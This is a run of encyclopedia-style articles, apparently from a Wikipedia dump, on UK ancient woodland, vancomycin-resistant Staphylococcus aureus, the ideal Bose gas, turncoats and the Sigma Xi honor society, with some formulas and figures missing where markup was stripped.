In the United Kingdom, ancient woodland is that which has existed continuously since 1600 in England, Wales and Northern Ireland (or 1750 in Scotland). The practice of planting woodland was uncommon before those dates, so a wood present in 1600 is likely to have developed naturally. In most ancient woods, the trees and shrubs have been felled periodically as part of the management cycle. Providing that the area has remained as woodland, the stand is still considered ancient. Since it may have been cut over many times in the past, ancient woodland does not necessarily contain trees that are particularly old. For many animal and plant species, ancient woodland sites provide the sole habitat. Furthermore, for many others, the conditions prevailing on these sites are much more suitable than those on other sites. Ancient woodland in the UK, like rainforest in the tropics, serves as a refuge for rare and endangered species. Consequently, ancient woodlands are frequently described as an irreplaceable resource, or 'critical natural capital'. The analogous term used in the United States, Canada and Australia (for woodlands that do contain very old trees) is "old-growth forest". Ancient woodland is formally defined on maps by Natural England and equivalent bodies. Mapping of ancient woodland has been undertaken in different ways and at different times, resulting in a variable quality and availability of data across regions, although there are some efforts to standardise and update it. Protection A variety of indirect legal protections exist for many ancient woodlands, but it is not automatically the case that any given ancient woodland is protected. Some examples of ancient woodland are nationally or locally designated, for example as Sites of Special Scientific Interest. Others lack such designations. Ancient woodlands also require special consideration when they are affected by planning applications. The National Planning Policy Framework, published in 2012, represents the British government's policy document pertaining to planning decisions affecting ancient woodlands. The irreplaceable nature of ancient woodlands is elucidated in paragraph 118 of the NPPF, which states: ‘Planning permission should be refused for development resulting in the loss or deterioration of irreplaceable habitats, including ancient woodland and the loss of aged or veteran trees found outside ancient woodland, unless the need for, and benefits of, the development in that location clearly outweigh the loss.’ Characteristics The concept of ancient woodland, characterised by high plant diversity and managed through traditional practices, was developed by the ecologist Oliver Rackham in his 1980 book Ancient Woodland, its History, Vegetation and Uses in England, which he wrote following his earlier research on Hayley Wood in Cambridgeshire. The definition of ancient woodland includes two sub-types: Ancient semi-natural woodland (ASNW) and Planted ancient woodland site (PAWS). Ancient semi-natural woodland (ASNW) is composed of native tree species that have not obviously been planted. Many of these woods also exhibit features characteristic of ancient woodland, including the presence of wildlife and structures of archaeological interest. Planted Ancient Woodland Sites (PAWS) are defined as ancient woodland sites where the native species have been partially or wholly replaced with a non-locally native species (usually but not exclusively conifers). These woodlands typically exhibit a plantation structure, characterized by even-aged crops of one or two species planted for commercial purposes. Many of these ancient woodlands were transformed into conifer plantations as a consequence of felling operations conducted during wartime. While PAWS sites may not possess the same high ecological value as ASNW, they often contain remnants of semi-natural species where shading has been less intense. This allows for the gradual restoration of more semi-natural structures through gradual thinning is often possible. Since the ecological and historical values of ancient woodland were recognized, PAWS restoration has been a priority amongst many woodland owners and governmental and non-governmental agencies. Various grant schemes have also supported this endeavor. Some restored PAWS sites are now practically indistinguishable from ASNW. There is no formal method for reclassifying restored PAWS as ASNW, although some woodland managers now use the acronym RPAWS (Restored Planted Ancient Woodland) for a restored site. Species which are particularly characteristic of ancient woodland sites are called ancient woodland indicator species, such as bluebells, ramsons, wood anemone, yellow archangel and primrose for example, representing a type of ecological indicator. The term is more frequently applied to desiccation-sensitive plant species, and particularly lichens and bryophytes, than to animals. This is due to the slower rate at which they colonise planted woodlands, which makes them more reliable indicators of ancient woodland sites. Sequences of pollen analysis can also serve as indicators of forest continuity. Lists of ancient woodland indicator species among vascular plants were developed by the Nature Conservancy Council (now Natural England) for each region of England, with each list containing the hundred most reliable indicators for that region. The methodology entailed the study of plants from known woodland sites, with an analysis of their occurrence patterns to determine which species were most indicative of sites from before 1600. In England this resulted in the first national Ancient Woodland Inventory, produced in the 1980s. Although ancient woodland indicator species have been recorded in post-1600 woodlands and also in non-woodland sites such as hedgerows, it is uncommon for a site that is not ancient woodland to host a double-figure indicator species total. More recent methodologies also supplement these field observations and ecological measurements with historical data from maps and local records, which were not fully assessed in the original Nature Conservancy Council surveys. History Ancient woods were valuable properties for their landowners, serving as a source of wood fuel, timber (estovers and loppage) and forage for pigs (pannage). In southern England, hazel was particularly important for coppicing, whereby the branches were used for wattle and daub in buildings, for example. Such old coppice stumps are easily recognised for their current overgrown state, given the waning prevalence of the practice. In such overgrown coppice stools, large boles emerge from a common stump. The term 'forest' originally encompassed more than simply woodland. It also referred to areas such as parkland, open heathland, upland fells, and any other territory situated between or outside of manorial freehold. These forests were the exclusive hunting preserve of the monarch or granted to nobility. The ancient woods that were situated within forests were frequently designated as Royal Parks. These were afforded special protection against poachers and other interlopers, and subject to tolls and fines where trackways passed through them or when firewood was permitted to be collected or other licenses granted. The forest law was rigorously enforced by a hierarchy of foresters, parkers and woodwards. In English land law, it was illegal to assart any part of a royal forest. This constituted the gravest form of trespass that could be committed in a forest, being considered more egregious than mere waste. While waste involved the felling of trees, which could be replanted, assarting entailed the complete uprooting of trees within the woodland of the afforested area. Boundary marking Ancient woods were well-defined, often being surrounded by a bank and ditch, which allowed them to be more easily recognised. The bank may also support a living fence of hawthorn or blackthorn to prevent livestock or deer from entering the area. Since they are attracted by young shoots on coppice stools as a food source, they must be excluded if the coppice is to regenerate. Such indicators can still be observed in many ancient woodlands, and large forests are often subdivided into woods and coppices with banks and ditches as was the case in the past. The hedges at the margins are often overgrown and may have spread laterally due to the neglect of many years. Many ancient woods are listed in the Domesday Book of 1086, as well as in the earlier Anglo-Saxon Chronicle. This is indicative of their significant value to early communities as a source of fuel and, moreover, as a source of food for farm animals. The boundaries are frequently described in terms of features such as large trees, streams or tracks, and even standing stones for example. Ancient woodland inventories Ancient woodland sites over in size are recorded in Ancient Woodland Inventories, compiled in the 1980s and 1990s by the Nature Conservancy Council in England, Wales, and Scotland; and maintained by its successor organisations in those countries. There was no inventory in Northern Ireland until the Woodland Trust completed one in 2006. Destruction Britain's ancient woodland cover has diminished considerably over time. Since the 1930s almost half of the ancient broadleaved woodland in England and Wales have been planted with conifers or cleared for agricultural use. The remaining ancient semi-natural woodlands in Britain cover a mere , representing less than 20% of the total wooded area. More than eight out of ten ancient woodland sites in England and Wales are less than in area. Only 617 exceed , which is a relatively small number. Forty-six of these sites exceed . Management Most ancient woodland in the UK has been managed in some way by humans for hundreds (in some cases probably thousands) of years. Two traditional techniques are coppicing (the practice of harvesting wood by cutting trees back to ground level) and pollarding (harvesting wood at approximately human head height to prevent new shoots being eaten by grazing species such as deer). Both techniques encourage new growth while allowing the sustainable production of timber and other woodland products. During the 20th century, the use of such traditional management techniques declined, concomitant with an increase in large-scale mechanized forestry. Consequently, coppicing is now seldom practiced, and overgrown coppice stools are a common feature in many ancient woods, with their numerous trunks of similar size. These shifts in management practices have resulted in alternations to ancient woodland habitats and a loss of ancient woodland to forestry. Examples Bedgebury Forest, Kent Bernwood Forest, Buckinghamshire and Oxfordshire Bradfield Woods, Suffolk Bradley Woods, Wiltshire Burnham Beeches, Bucks Cannock Chase, Staffordshire Cherry Tree Wood, London Claybury Woods, London Coldfall Wood, London Dolmelynllyn Estate, Gwynedd Dyscarr Woods, Nottinghamshire. Edford Woods and Meadows, Somerset Epping Forest, Essex Forest of Dean West Gloucestershire Foxley Wood, Norfolk Grass Wood, Wharfedale, Yorkshire Hatfield Forest, Essex Hazleborough Wood, Northamptonshire, part of Whittlewood Forest Highgate Wood, London Hollington Wood, Buckinghamshire Holt Heath, Dorset King's Wood, Heath and Reach, Bedfordshire Lower Woods, Gloucestershire New Forest, Hampshire Parkhurst Forest, Isle of Wight Puzzlewood, in the Forest of Dean Queen's Wood, London Ryton Woods, Warwickshire Salcey Forest, Northamptonshire Savernake Forest, Wiltshire Sherwood Forest, Nottinghamshire Snakes Wood, Suffolk Titnore Wood, West Sussex Vincients Wood, Wiltshire Wentwood, Monmouthshire Whinfell Forest, Cumbria Whittlewood Forest, Northamptonshire Windsor Great Park, Berkshire Wistman's Wood, Devon Wormshill, Kent: Barrows Wood, Trundle Wood and High Wood Wyre Forest, bordering Shropshire and Worcestershire Yardley Chase, Northamptonshire See also References External links Ancient Tree Guides by the Woodland Trust (archived 5 November 2011) History of forestry Forests and woodlands of the United Kingdom Forests and woodlands of England Old-growth forests Forest history Types of formally designated forests
Ancient woodland
[ "Biology" ]
2,328
[ "Old-growth forests", "Ecosystems" ]
1,064,656
https://en.wikipedia.org/wiki/Vancomycin-resistant%20Staphylococcus%20aureus
Vancomycin-resistant Staphylococcus aureus (VRSA) are strains of Staphylococcus aureus that have acquired resistance to the glycopeptide antibiotic vancomycin. Bacteria can acquire resistance genes either by random mutation or through the transfer of DNA from one bacterium to another. Resistance genes interfere with the normal antibiotic function and allow bacteria to grow in the presence of the antibiotic. Resistance in VRSA is conferred by the plasmid-mediated vanA gene and operon. Although VRSA infections are uncommon, VRSA is often resistant to other types of antibiotics and a potential threat to public health because treatment options are limited. VRSA is resistant to many of the standard drugs used to treat S. aureus infections. Furthermore, resistance can be transferred from one bacterium to another. Mechanism of acquired resistance Vancomycin-resistant Staphylococcus aureus was first reported in the United States in 2002. To date, documented cases of VRSA have acquired resistance through uptake of a vancomycin resistance gene cluster from Enterococcus (i.e. VRE). The acquired mechanism is typically the vanA gene and operon from a plasmid in Enterococcus faecium or Enterococcus faecalis. This mechanism differs from strains of vancomycin-intermediate Staphylococcus aureus (VISA), which appear to develop elevated MICs to vancomycin through sequential mutations resulting in a thicker cell wall and the synthesis of excess amounts of D-ala-D-ala residues. Diagnosis The diagnosis of vancomycin-resistant Staphylococcus aureus (VRSA) is performed by performing susceptibility testing on a single S. aureus isolate to vancomycin. This is accomplished by first assessing the isolate's minimum inhibitory concentration (MIC) using standard laboratory methods, including disc diffusion, gradient strip diffusion, and automated antimicrobial susceptibility testing systems. Once the MIC is known, resistance is determined by comparing the MIC with established breakpoints Resistant or "R" designations are assigned based on agreed upon values called breakpoints. Breakpoints are published by standards development organizations such as the U.S. Clinical and Laboratory Standards Institute, the British Society for Antimicrobial Chemotherapy and the European Committee on Antimicrobial Susceptibility Testing. Treatment of infection When the minimum inhibitory concentration of vancomycin is , alternative antibiotics should be used. The approach is to treat with at least one agent to which the bacteria known to be susceptible by in vitro testing. The agents that are used include daptomycin, linezolid, telavancin, ceftaroline, and quinupristin–dalfopristin. For people with methicillin-resistant Staphylococcus aureus (MRSA) bacteremia in the setting of vancomycin failure the Infectious Diseases Society of America recommends high-dose daptomycin, if the isolate is susceptible, in combination with another agent (e.g., gentamicin, rifampin, linezolid, trimethoprim/sulfamethoxazole, or a beta-lactam antibiotic). History Three classes of vancomycin-resistant S. aureus have emerged that differ in vancomycin susceptibilities: vancomycin-intermediate S. aureus (VISA), heterogeneous vancomycin-intermediate S. aureus (hVISA), and high-level vancomycin-resistant S. aureus (VRSA). Vancomycin-intermediate S. aureus (VISA) Vancomycin-intermediate S. aureus (VISA) ( or ) was first identified in Japan in 1996 and has since been found in hospitals elsewhere in Asia, as well as in the United Kingdom, France, the U.S., and Brazil. It is also termed GISA (glycopeptide-intermediate Staphylococcus aureus), indicating resistance to all glycopeptide antibiotics. These bacterial strains present a thickening of the cell wall, which is believed to reduce the ability of vancomycin to diffuse into the division septum of the cell required for effective vancomycin treatment. Vancomycin-resistant S. aureus (VRSA) High-level vancomycin resistance in S. aureus has been rarely reported. In vitro and in vivo experiments reported in 1992 demonstrated that vancomycin resistance genes from Enterococcus faecalis could be transferred by gene transfer to S. aureus, conferring high-level vancomycin resistance to S. aureus. Until 2002 such a genetic transfer was not reported for wild S. aureus strains. In 2002, a VRSA strain ( or ) was isolated from a patient in Michigan. The isolate contained the mecA gene for methicillin resistance. Vancomycin MICs of the VRSA isolate were consistent with the VanA phenotype of Enterococcus species, and the presence of the vanA gene was confirmed by polymerase chain reaction. The DNA sequence of the VRSA vanA gene was identical to that of a vancomycin-resistant strain of Enterococcus faecalis recovered from the same catheter tip. The vanA gene was later found to be encoded within a transposon located on a plasmid carried by the VRSA isolate. This transposon, Tn1546, confers vanA-type vancomycin resistance in enterococci. As of 2019, 52 VRSA strains have been identified in the United States, India, Iran, Pakistan, Brazil, and Portugal. Heterogeneous vancomycin-intermediate S. aureus (hVISA) The definition of hVISA according to Hiramatsu et al. is a strain of Staphylococcus aureus that gives resistance to vancomycin at a frequency of 10−6 colonies or even higher. See also Drug resistance References Further reading External links PubMed Staphylococcaceae Bacterial diseases Antibiotic-resistant bacteria Staphylococcus
Vancomycin-resistant Staphylococcus aureus
[ "Biology" ]
1,293
[ "Bacteria", "Antibiotic-resistant bacteria" ]
1,064,839
https://en.wikipedia.org/wiki/Bose%20gas
An ideal Bose gas is a quantum-mechanical phase of matter, analogous to a classical ideal gas. It is composed of bosons, which have an integer value of spin and abide by Bose–Einstein statistics. The statistical mechanics of bosons were developed by Satyendra Nath Bose for a photon gas and extended to massive particles by Albert Einstein, who realized that an ideal gas of bosons would form a condensate at a low enough temperature, unlike a classical ideal gas. This condensate is known as a Bose–Einstein condensate. Introduction and examples Bosons are quantum mechanical particles that follow Bose–Einstein statistics, or equivalently, that possess integer spin. These particles can be classified as elementary: these are the Higgs boson, the photon, the gluon, the W/Z and the hypothetical graviton; or composite like the atom of hydrogen, the atom of 16O, the nucleus of deuterium, mesons etc. Additionally, some quasiparticles in more complex systems can also be considered bosons like the plasmons (quanta of charge density waves). The first model that treated a gas with several bosons, was the photon gas, a gas of photons, developed by Bose. This model leads to a better understanding of Planck's law and the black-body radiation. The photon gas can be easily expanded to any kind of ensemble of massless non-interacting bosons. The phonon gas, also known as Debye model, is an example where the normal modes of vibration of the crystal lattice of a metal, can be treated as effective massless bosons. Peter Debye used the phonon gas model to explain the behaviour of heat capacity of metals at low temperature. An interesting example of a Bose gas is an ensemble of helium-4 atoms. When a system of 4He atoms is cooled down to temperature near absolute zero, many quantum mechanical effects are present. Below 2.17 K, the ensemble starts to behave as a superfluid, a fluid with almost zero viscosity. The Bose gas is the most simple quantitative model that explains this phase transition. Mainly when a gas of bosons is cooled down, it forms a Bose–Einstein condensate, a state where a large number of bosons occupy the lowest energy, the ground state, and quantum effects are macroscopically visible like wave interference. The theory of Bose-Einstein condensates and Bose gases can also explain some features of superconductivity where charge carriers couple in pairs (Cooper pairs) and behave like bosons. As a result, superconductors behave like having no electrical resistivity at low temperatures. The equivalent model for half-integer particles (like electrons or helium-3 atoms), that follow Fermi–Dirac statistics, is called the Fermi gas (an ensemble of non-interacting fermions). At low enough particle number density and high temperature, both the Fermi gas and the Bose gas behave like a classical ideal gas. Macroscopic limit The thermodynamics of an ideal Bose gas is best calculated using the grand canonical ensemble. The grand potential for a Bose gas is given by: where each term in the sum corresponds to a particular single-particle energy level εi; gi is the number of states with energy εi; z is the absolute activity (or "fugacity"), which may also be expressed in terms of the chemical potential μ by defining: and β defined as: where kB is the Boltzmann constant and T is the temperature. All thermodynamic quantities may be derived from the grand potential and we will consider all thermodynamic quantities to be functions of only the three variables z, β (or T), and V. All partial derivatives are taken with respect to one of these three variables while the other two are held constant. The permissible range of z is from negative infinity to +1, as any value beyond this would give an infinite number of particles to states with an energy level of 0 (it is assumed that the energy levels have been offset so that the lowest energy level is 0). Macroscopic limit, result for uncondensed fraction Following the procedure described in the gas in a box article, we can apply the Thomas–Fermi approximation, which assumes that the average energy is large compared to the energy difference between levels so that the above sum may be replaced by an integral. This replacement gives the macroscopic grand potential function , which is close to : The degeneracy dg may be expressed for many different situations by the general formula: where α is a constant, Ec is a critical energy, and Γ is the gamma function. For example, for a massive Bose gas in a box, and the critical energy is given by: where Λ is the thermal wavelength, and f is a degeneracy factor ( for simple spinless bosons). For a massive Bose gas in a harmonic trap we will have and the critical energy is given by: where V(r) = mω2r2/2 is the harmonic potential. It is seen that Ec is a function of volume only. This integral expression for the grand potential evaluates to: where Lis(x) is the polylogarithm function. The problem with this continuum approximation for a Bose gas is that the ground state has been effectively ignored, giving a degeneracy of zero for zero energy. This inaccuracy becomes serious when dealing with the Bose–Einstein condensate and will be dealt with in the next sections. As will be seen, even at low temperatures the above result is still useful for accurately describing the thermodynamics of just the uncondensed portion of the gas. Limit on number of particles in uncondensed phase, critical temperature The total number of particles is found from the grand potential by This increases monotonically with z (up to the maximum z = +1). The behaviour when approaching z = 1 is however crucially dependent on the value of α (i.e., dependent on whether the gas is 1D, 2D, 3D, whether it is in a flat or harmonic potential well). For , the number of particles only increases up to a finite maximum value, i.e., Nm is finite at : where ζ(α) is the Riemann zeta function (using ). Thus, for a fixed number of particles Nm, the largest possible value that β can have is a critical value βc. This corresponds to a critical temperature , below which the Thomas–Fermi approximation breaks down (the continuum of states simply can no longer support this many particles, at lower temperatures). The above equation can be solved for the critical temperature: For example, for the three-dimensional Bose gas in a box ( and using the above noted value of Ec) we get: For , there is no upper limit on the number of particles (Nm diverges as z approaches 1), and thus for example for a gas in a one- or two-dimensional box ( and respectively) there is no critical temperature. Inclusion of the ground state The above problem raises the question for : if a Bose gas with a fixed number of particles is lowered down below the critical temperature, what happens? The problem here is that the Thomas–Fermi approximation has set the degeneracy of the ground state to zero, which is wrong. There is no ground state to accept the condensate and so particles simply 'disappear' from the continuum of states. It turns out, however, that the macroscopic equation gives an accurate estimate of the number of particles in the excited states, and it is not a bad approximation to simply "tack on" a ground state term to accept the particles that fall out of the continuum: where N0 is the number of particles in the ground state condensate. Thus in the macroscopic limit, when , the value of z is pinned to 1 and N0 takes up the remainder of particles. For there is the normal behaviour, with . This approach gives the fraction of condensed particles in the macroscopic limit: Limitations of the macroscopic Bose gas model The above standard treatment of a macroscopic Bose gas is straightforward, but the inclusion of the ground state is somewhat inelegant. Another approach is to include the ground state explicitly (contributing a term in the grand potential, as in the section below), this gives rise to an unrealistic fluctuation catastrophe: the number of particles in any given state follow a geometric distribution, meaning that when condensation happens at and most particles are in one state, there is a huge uncertainty in the total number of particles. This is related to the fact that the compressibility becomes unbounded for . Calculations can instead be performed in the canonical ensemble, which fixes the total particle number, however the calculations are not as easy. Practically however, the aforementioned theoretical flaw is a minor issue, as the most unrealistic assumption is that of non-interaction between bosons. Experimental realizations of boson gases always have significant interactions, i.e., they are non-ideal gases. The interactions significantly change the physics of how a condensate of bosons behaves: the ground state spreads out, the chemical potential saturates to a positive value even at zero temperature, and the fluctuation problem disappears (the compressibility becomes finite). See the article Bose–Einstein condensate. Approximate behaviour in small gases For smaller, mesoscopic, systems (for example, with only thousands of particles), the ground state term can be more explicitly approximated by adding in an actual discrete level at energy ε=0 in the grand potential: which gives instead . Now, the behaviour is smooth when crossing the critical temperature, and z approaches 1 very closely but does not reach it. This can now be solved down to absolute zero in temperature. Figure 1 shows the results of the solution to this equation for , with , which corresponds to a gas of bosons in a box. The solid black line is the fraction of excited states for and the dotted black line is the solution for . The blue lines are the fraction of condensed particles N0/N. The red lines plot values of the negative of the chemical potential μ and the green lines plot the corresponding values of z. The horizontal axis is the normalized temperature τ defined by It can be seen that each of these parameters become linear in τα in the limit of low temperature and, except for the chemical potential, linear in 1/τα in the limit of high temperature. As the number of particles increases, the condensed and excited fractions tend towards a discontinuity at the critical temperature. The equation for the number of particles can be written in terms of the normalized temperature as: For a given N and τ, this equation can be solved for τα and then a series solution for z can be found by the method of inversion of series, either in powers of τα or as an asymptotic expansion in inverse powers of τα. From these expansions, we can find the behavior of the gas near and in the Maxwell–Boltzmann as T approaches infinity. In particular, we are interested in the limit as N approaches infinity, which can be easily determined from these expansions. This approach to modelling small systems may in fact be unrealistic, however, since the variance in the number of particles in the ground state is very large, equal to the number of particles. In contrast, the variance of particle number in a normal gas is only the square-root of the particle number, which is why it can normally be ignored. This high variance is due to the choice of using the grand canonical ensemble for the entire system, including the condensate state. Thermodynamics Expanded out, the grand potential is: All thermodynamic properties can be computed from this potential. The following table lists various thermodynamic quantities calculated in the limit of low temperature and high temperature, and in the limit of infinite particle number. An equal sign (=) indicates an exact result, while an approximation symbol indicates that only the first few terms of a series in is shown. It is seen that all quantities approach the values for a classical ideal gas in the limit of large temperature. The above values can be used to calculate other thermodynamic quantities. For example, the relationship between internal energy and the product of pressure and volume is the same as that for a classical ideal gas over all temperatures: A similar situation holds for the specific heat at constant volume The entropy is given by: Note that in the limit of high temperature, we have which, for α = 3/2 is simply a restatement of the Sackur–Tetrode equation. In one dimension bosons with delta interaction behave as fermions, they obey Pauli exclusion principle. In one dimension Bose gas with delta interaction can be solved exactly by Bethe ansatz. The bulk free energy and thermodynamic potentials were calculated by Chen-Ning Yang. In one dimensional case correlation functions also were evaluated. In one dimension Bose gas is equivalent to quantum non-linear Schrödinger equation. See also Tonks–Girardeau gas References General references Bose–Einstein statistics Ideal gas Quantum mechanics Thermodynamics Satyendra Nath Bose
Bose gas
[ "Physics", "Chemistry", "Mathematics" ]
2,742
[ "Thermodynamic systems", "Theoretical physics", "Quantum mechanics", "Physical systems", "Thermodynamics", "Ideal gas", "Dynamical systems" ]
1,064,845
https://en.wikipedia.org/wiki/Turncoat
A Turncoat, also known as a Turncloak, is a person who shifts allegiance from one loyalty or ideal to another, betraying or deserting an original cause by switching to the opposing side or party. In political and social history, this is distinct from being a traitor, as the switch mostly takes place under the following circumstances: In groups, often driven by one or more leaders. When the goal that formerly motivated and benefited the person becomes (or is perceived as having become) either no longer feasible or too costly even if success is achieved. From a military perspective, opposing armies generally wear uniforms of contrasting colors to prevent incidents of friendly fire. Thus the term "turn-coat" indicates that an individual has changed sides and his uniform coat to one matching the color of his former enemy. For example, in the English Civil War during the 17th century, Oliver Cromwell's soldiers turned their coats inside out to match the colors of the Royal army (see Examples below). Historical context Even in a modern historical context "turncoat" is often synonymous with the term "renegade", a term of religious origins having its origins in the Latin word "renegare" (to deny). Historical currents of great magnitude have periodically caught masses of people, along with their leaders, in their wake. In such a dire situation, new perspectives on past actions are laid bare and the question of personal treason becomes muddled. One example would be the situation that led to the Act of Abjuration or Plakkaat van Verlatinghe, signed on July 26, 1581, in the Netherlands, an instance where changing sides was given a positive meaning. The first written use of the term meaning was by J. Foxe in Actes & Monuments in 1570: "One who changes his principles or party; a renegade; an apostate." Cited 1571* "Turncoat" could also have a more literal origin. According to the Rotuli Chartarum 1199–1216 two barons changed fealty from William Marshal, 1st Earl of Pembroke, to King John. In other words, they turned their coats (of arms) from one lord to another, hence turncoat. Process A mass-shift in allegiance by a population may take place during military occupation, after a nation has been defeated in war or after a major social upheaval, such as a revolution. Following the initial traumatic times, many of the citizens of the area in question quickly embrace the cause of the victors to benefit from the new system. This shift of allegiance is often done without much knowledge about the new order that is replacing the former one. In the face of fear and insecurity, the prime motive for a turncoat to draw away from former allegiances may be mere survival. Often the leaders are the first to change loyalties, for they have had access to privileged information and are more aware of the hopelessness of the situation for their former cause. This is especially apparent in dictatorships and authoritarian states when most of the population has been fed propaganda and triumphalism and has been kept in the dark about important turns of events. Aftermath As time goes by, along with the embracing of life under the new circumstances comes a need of burying and rewriting the past by concealing evidence. The fear of the past coming to upset the newly found stability is always present in the mind of the turncoat. The past is rewritten and whitewashed to cover former deeds. When successful, this activity results in the distortion and falsification of historical events. Even after the death of a turncoat his family and friends may wish to keep uncomfortable secrets from the past out of the light. There is a fear of loss of prestige as well as a wish to honor the memory of a family member from the part of those who have experienced the positive side of the person. In certain countries, individuals and organizations have actively investigated the past to bring turncoats to justice to face their responsibilities. Examples There were many turncoats in history, including: The English Civil War during the 17th century. The siege of Corfe Castle was won by Oliver Cromwell's soldiers when they turned their coats inside out to match the colors of the Royal army. During the revolution of the British American colonies when U.S. Continental Army Major General Benedict Arnold defected to the side of the British in May 1779. Canada during the War of 1812. Some Canadians felt republicanism was a better system of government than the constitutional British monarchy and fought on the side of the invading Americans. Germany and Austria after World War II when many former enthusiastic members of the Nazi Party embraced the newly created nations of West Germany or East Germany and sought to erase or at least minimize their former role as Nazis. During the decades that followed, many former Nazis regained prestige and held high posts in the new republics. Kurt Waldheim, an Austrian Nazi, even held the highest post as Secretary-General of the United Nations from 1972 to 1981 and as President of Austria from 1986 to 1992. France after the downfall of the Vichy Regime, when many collaborationists, whether home-grown fascists or Nazi sympathizers, played down their role in the former government and its institutions. Russia and the former Communist Eastern European countries after the fall of the USSR, where many former communists suddenly became fervent supporters of capitalism. As a result, many former apparatchiks abandoned the Communist Party in favor of positions in the new government structures. In Spain after the Spanish Civil War (1936–1939), and again during the Spanish transition to democracy (1975 onwards). In Syria, right after the fall of the Assad regime on 12/8/2024, many of his supporters (Shabiha) turned against him and began voicing support for the revolution. Just days before his escape, they were calling for bombs to be dropped on rebel-controlled areas. See also Abjuration Benedict Arnold a general who originally fought for the American Continental Army but defected to the British Army Collaboration with the Axis Powers during World War II Cover-up Craig Counsell Defection Dual loyalty in politics Flip-flop (politics) Historical revisionism (negationism), falsification of history History of the Soviet Union (1982–1991) Dissolution of the Soviet Union Jacques Dutronc whose song L'opportuniste is about being a turncoat List of former Nazi Party members Nazi hunter Pursuit of Nazi collaborators Quisling Whitewash (censorship) References Human behavior Deception Political science Defectors by type
Turncoat
[ "Biology" ]
1,324
[ "Opportunism", "Behavior", "Human behavior" ]
1,064,914
https://en.wikipedia.org/wiki/Sigma%20Xi
Sigma Xi, The Scientific Research Honor Society () is a non-profit honor society for scientists and engineers. Sigma Xi was founded at Cornell University by a junior faculty member and a small group of graduate students in 1886 and is one of the oldest honor societies. Membership in Sigma Xi is by invitation only, where members nominate others on the basis of their research achievements or potential. Sigma Xi goals aim to honor excellence in scientific investigation and encourage cooperation among researchers in all fields of science and engineering. Many of the world's most influential scientists have been members of Sigma Xi, such as Albert Einstein, Linus Pauling, Barbara McClintock, and Sally Ride. Overview Sigma Xi has nearly 60,000 members who were elected to membership based on their research achievements and potential. It has more than 500 chapters in North America and around the world. In addition to publishing American Scientist magazine, Sigma Xi provides grants annually to promising young researchers and sponsors a variety of programs supporting ethics in research, science and engineering education, the public understanding of science, international research cooperation and the overall health of the research enterprise. The Society is based in Research Triangle Park, North Carolina. Sigma Xi was one of six honor societies that co-founded the ACHS on . Its participation was short lived, with the decision to withdraw and operate again as an independent society made just over a decade later, effective in . Today, Sigma Xi participates in a more loosely coordinated lobbying association of four of the nation's oldest and most prestigious honor societies, called the Honor Society Caucus. Its members include Phi Beta Kappa, Phi Kappa Phi, Sigma Xi, and Omicron Delta Kappa. History Sigma Xi originated in 1886 at Cornell University. Founded by engineering students and Cornell faculty member, Frank Van Vleck, the society's primary objective was to acknowledge significant scientific research and foster cooperation among scientists from various disciplines. By 1888, Sigma Xi included five female members and established chapters at educational institutions such as Rensselaer Polytechnic Institute, Union College, Stevens Institute of Technology, and Rutgers College. By the end of the 19th century, the society consisted of over 1,000 members in eight chapters. In the early 20th century, following the 1906 San Francisco earthquake, Sigma Xi's Stanford and Berkeley chapters were involved in reconstruction and public health initiatives. The society later introduced the publication American Scientist, which discusses scientific and technological developments. During World War I, the National Research Council collaborated with Sigma Xi to organize research facilities. The society expanded significantly after the war, and by the 1930s, it had chapters at prestigious institutions like Harvard, Caltech, MIT, and Princeton. Sigma Xi initiated the Distinguished Lectureships Program in the late 1930s, aimed at promoting its activities and research findings. By 1950, the society's membership numbered 42,000. In 1947, the Scientific Research Society of America (RESA) was created to support research in various settings. The two societies combined in 1974 under the name Sigma Xi, The Scientific Research Society. In 1989, Sigma Xi revised its mission statement, emphasizing the importance of science and its role in society. Currently, Sigma Xi has approximately 60,000 members in over 500 chapters worldwide. The society remains committed to recognizing scientific achievements and promoting global collaboration in science and technology. Notable past presidents of Sigma Xi include Frederick Robbins, a Nobel Prize recipient, and Rita Colwell, the former National Science Foundation Director. Motto and name The Greek letters "Sigma" and "Xi" form the acronym of the Society's motto, or "Spoudon Xynones," which translates as "Companions in Zealous Research." The word 'Honor' was added to the name of the Society at the 2016 Annual Meeting. According to Sigma Xi President Tee L. Guidotti, "Sigma Xi, of course, is our basic name and has been since the organization was founded in 1886 as the scientific and engineering counterpart to Phi Beta Kappa. Like all "Greek letter" societies, whether professional or social, it is an acronym for the motto of the organization, (Spoudon Xynones), which translates as "companions in Zealous Research." For many years, we were referred to as "Society of the Sigma Xi." In the early twentieth century, some in the leadership wanted "Sigma Xi" to be dropped altogether in favor of some formulation such as "Scientific Research Society of America." In a strange quirk of history, both names survived because the organization split in the 1940s into an academic honor society (Sigma Xi) and an honor society for applied research and engineering (the Scientific Research Society of America, called RESA). RESA was a separate entity, wholly owned by Sigma Xi, and represented engineers and scientists at non-academic institutions, such as government and industrial research laboratories. In an even stranger development, Sigma Xi and RESA merged back together in 1974 and eventually began calling itself Sigma Xi, The Scientific Research Society." William Procter Prize The William Procter Prize for Scientific Achievement is an award presented by Sigma Xi. This prestigious prize is given to a scientist who has made an outstanding contribution to scientific research and has demonstrated an ability to communicate the significance of this research to scientists in other disciplines. The prize was established in 1950 in honor of William Procter, a distinguished business leader and philanthropist who had a strong commitment to scientific research and development. Procter was an heir to the Procter & Gamble Company and served as its president and chairman. Recipients of the William Procter Prize are recognized for their achievements in both research and communication, reflecting the dual emphasis of Sigma Xi on promoting both scientific excellence and interdisciplinary communication. Along with the recognition, the awardee also delivers a lecture at the society's annual meeting or another appropriate occasion. Over the years, the William Procter Prize has been awarded to many notable scientists from a wide range of disciplines, underscoring the prize's commitment to honoring and promoting interdisciplinary research. Chapters As of May 4, 2023, 350 chapters are active in the United States, 170 are inactive, and the society has chartered over 20 chapters in other countries. Notable members More than 200 winners of the Nobel Prize have been Sigma Xi members, including Albert Einstein, Enrico Fermi, Richard Feynman, Linus Pauling, Francis Crick, James Watson, Barbara McClintock, John Goodenough, and Jennifer Doudna. See also Alpha Chi Sigma, a professional fraternity specializing in the fields of the chemical sciences References External links Sigma Xi's Year of Water H2008 Blog Guide to the Sigma Xi, The Scientific Research Society Records 1928-2003 International scientific organizations Scientific societies based in the United States 1886 establishments in New York (state) Scientific organizations established in 1886 Former members of Association of College Honor Societies Student organizations established in 1886 Honor Society Caucus Engineering honor societies
Sigma Xi
[ "Engineering" ]
1,376
[ "Engineering societies", "Engineering honor societies" ]
1,065,009
https://en.wikipedia.org/wiki/Smart%20material
